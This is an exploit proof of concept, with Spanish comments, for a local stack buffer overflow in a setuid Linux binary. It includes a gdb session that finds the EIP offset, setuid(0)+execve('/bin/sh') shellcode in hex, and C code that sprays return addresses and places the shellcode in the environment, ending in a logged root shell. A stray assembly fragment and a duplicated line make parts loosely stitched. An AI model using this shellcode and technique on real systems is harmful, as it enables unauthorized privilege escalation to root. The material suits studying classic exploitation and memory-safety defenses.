xorl %eax, %eax ; 0
                pushl %eax
                pushl $0x68732f2f" ;/sh
                pushl $0x6e69622f ;/bin
                movl  %esp, %ebx
                pushl %eax
                pushl %ebx
                movl %esp, %ecx
                xorl %edx, %edx
                movb $0xb, %al ; execve
                int $0x80 ; run
; hasta aca bien pero luego ?             
                xorl %eax, %eax ; 0 again?
                incb %al
                xorl %ebx, %ebx ; 0 ebx ?
                int $0x80 ; RUN ??? why ?

/*
  Name: 'x' >> x.c
  Copyright: [N]eo [S]ecurity [T]eam [NST]® - http://neosecurityteam.net/
  Author: HaCkZaTaN
  Date: 26/01/05 16:17
  Description: Local Stack Buffer Overflow
*/

/*
Test:
root@NST:/home/h4ck# ./v
Uso: ./v <SuNombre>
root@NST:/home/h4ck# ./v `perl -e 'print "A" x 523'`
Tu nombre es: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
root@NST:/home/h4ck# ./v `perl -e 'print "A" x 524'`
Tu nombre es: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault
root@NST:/home/h4ck# mmm yo no creo que EIP se alla sobre escrito tratemos haber de otra manera
-su: mmm: command not found
root@NST:/home/h4ck# ./v `perl -e'print "A" x 524'``printf "\x42\x42\x42\x42"`
Tu nombre es: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB
Segmentation fault
root@NST:/home/h4ck# gdb ./v
GNU gdb 6.3
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i486-slackware-linux"...Using host libthread_db library "/lib/libthread_db.so.1".

(gdb) r `perl -e'print "A" x 524'``printf "\x42\x42\x42\x42"`
Starting program: /home/h4ck/v `perl -e'print "A" x 524'``printf "\x42\x42\x42\x42"`
Tu nombre es: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) i r esp eip ebp
esp            0xbffff630       0xbffff630
eip            0x42424242       0x42424242
ebp            0x42424242       0x42424242
(gdb) q
The program is running.  Exit anyway? (y or n) y
root@NST:/home/h4ck# OK EIP Se sobre escribio ahora codeemos
-su: OK: command not found
root@NST:/home/h4ck#

---------------------------------------------------
bueno yo le coloque a 'v'
root@NST:/home/h4ck# chmod 4755 v && chown root.root v
root@NST:/home/h4ck#

h4ck@NST:~$ ./x
Use: ./x <path>
h4ck@NST:~$ ./x /home/h4ck/v

[+] 'x' >> x.c Local Stack Buffer Overflow (Proof of Concept)
[+] by HaCkZaTaN <hck_zatan@hotmail.com>
[+] [N]eo [S]ecurity [T]eam [NST]® - http://neosecurityteam.net/
[+] Ret: = 0xbfffffd1
[+] Shellcode : 29
[+] Waiting............
Tu nombre es: Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ñÿÿ¿Ø
sh-3.00# id
uid=0(root) gid=100(users) groups=100(users)
sh-3.00#
*/

#include <stdio.h>
#include <strings.h>
#define BUFFER 524 + 1

char shellcode[]=
/* Shellcode by HaCkZaTaN */
// setuid(0)
"\x31\xdb"                  //xor    %ebx,%ebx ; 0
"\x53"                      //push   %ebx
"\x8d\x43\x17"              //lea    0x17(%ebx),%eax ; SYS_setuid
"\xcd\x80"                  //int    $0x80 ;kernel
//execve()
"\x99"                      //cltd
"\x68\x6e\x2f\x73\x68"      //push   $0x68732f6e 'hs/n'
"\x68\x2f\x2f\x62\x69"      //push   $0x69622f2f 'ib//'  > /bin/sh
"\x89\xe3"                  //mov    %esp,%ebx
"\x50"                      //push   %eax
"\x53"                      //push   %ebx
"\x89\xe1"                  //mov    %esp,%ecx
"\xb0\x0b"                  //mov    $0xb,%al ; SYS_Execve
"\xcd\x80";                 //int    $0x80 ;Kernel

int main(int argc, char *argv[])
{
   char *env[3] = {shellcode, NULL};
   char buf[BUFFER], *path;
   int *buffer = (int *) (buf);
   int i, ret;

   if(argc != 2) {
      printf(" Use: %s <path>\n", argv[0]);
      exit(0);
   }

   path = argv[1];

   ret = 0xbffffffa - strlen(shellcode) - strlen(path);

   for(i=0; i<=BUFFER; i+=4)
   *buffer++ = ret;

   printf("\n[+] 'x' >> x.c Local Stack Buffer Overflow (Proof of Concept)\n");
   printf("[+] by HaCkZaTaN <hck_zatan@hotmail.com>\n");
   printf("[+] [N]eo [S]ecurity [T]eam [NST]® - http://neosecurityteam.net/\n");
   printf("[+] Ret: = %.8p\n", ret);
   printf("[+] Shellcode : %d\n",strlen(shellcode));
   printf("[+] Waiting............\n");

   execle(path, "v", buf, NULL, env);
}

  ret = 0xbffffffa - strlen(shellcode) - strlen(path);